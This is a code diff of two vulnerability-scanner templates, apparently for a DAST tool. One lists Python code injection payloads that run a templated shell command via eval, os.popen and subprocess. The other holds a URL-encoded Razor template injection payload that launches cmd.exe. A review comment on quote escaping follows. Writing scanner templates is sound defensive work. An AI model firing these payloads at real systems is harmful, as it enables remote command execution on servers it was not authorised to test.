diff --git a/dast/vulnerabilities/cmdi/python-code-injection.yaml b/dast/vulnerabilities/cmdi/python-code-injection.yaml
index fd9516dc7a6..5563b22ec77 100644
--- a/dast/vulnerabilities/cmdi/python-code-injection.yaml
+++ b/dast/vulnerabilities/cmdi/python-code-injection.yaml
@@ -4,8 +4,6 @@ info:
 name: Python Code Injection
 author: ritikchaddha
 severity: high
- metadata:
- max-request:
 tags: python,dast,injection,cmdi
 variables:
@@ -20,18 +18,18 @@ http:
 payloads:
 injection:
 - eval(compile("""for x in range(1):\\n import os\\n os.popen(r'{{Command}}').read()""",'','single'))
- #without loop, one expression
+ # without loop, one expression
 - eval(compile("""__import__('os').popen(r'{{Command}}').read()""",'','single'))
- #without loop, one expression
+ # without loop, one expression
 - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True)""",'','single'))
- #without compile
+ # without compile
 - __import__('os').popen('{{Command}}').read()
- #multiple expressions, separated by commas
+ # multiple expressions, separated by commas
 - str("-"*50),__import__('os').popen('{{Command}}').read()
- #multiple statements, separated by semicolons
+ # multiple statements, separated by semicolons
 - eval(compile("""__import__('os').popen(r'{{Command}}').read();import time;time.sleep(2)""",'','single'))
 - eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True);import time;time.sleep(2)""",'','single'))
- #with `for` loop technique, without global __import__ using subprocess.popen
+ # with `for` loop technique, without global __import__ using subprocess.popen
 - eval(compile("""for x in range(1):\n import os\n os.popen(r'{{Command}}').read()""",'','single'))
 - eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'{{Command}}',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
 - eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'{{Command}}',shell=True)""",'','single'))
diff --git a/dast/vulnerabilities/ssti/razor-ssti.yaml b/dast/vulnerabilities/ssti/razor-ssti.yaml
index aa6b5a71001..616901d8f8d 100644
--- a/dast/vulnerabilities/ssti/razor-ssti.yaml
+++ b/dast/vulnerabilities/ssti/razor-ssti.yaml
@@ -20,7 +20,7 @@ http:
 payloads:
 injection:
- - "@{string+x%3Dnull%3Bint[]l%3D{105%2C100}%3Bforeach(int+c+in+l){x%2B%3D((char)c).ToString()%3B}%3B}@System.Diagnostics.Process.Start("cmd.exe"%2C+"/c+"+x)"
+ - "@{string+x%3Dnull%3Bint[]l%3D{105%2C100}%3Bforeach(int+c+in+l){x%2B%3D((char)c).ToString()%3B}%3B}@System.Diagnostics.Process.Start(%22cmd.exe%22%2C+%22/c+%22+x)"
 fuzzing:
 - part: query
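Review bot: The new `injection` entry writes the inner quotes as `%22`, but nothing on the line says why, so a later edit could put a literal `"` back and end the double-quoted YAML scalar early, as the removed line did. I would add a comment directly above the entry, `# value is pre-URL-encoded; inner double quotes must stay %22 because this scalar is double-quoted`. The string still mixes encoded characters (`%3D`, `%2C`, `%22`) with raw `{`, `}`, `[` and `]`, so the comment should also say whether that split is intentional. The matchers and the rest of the `fuzzing` block are outside the hunk, so I cannot tell from here whether the engine encodes the value again before it is sent.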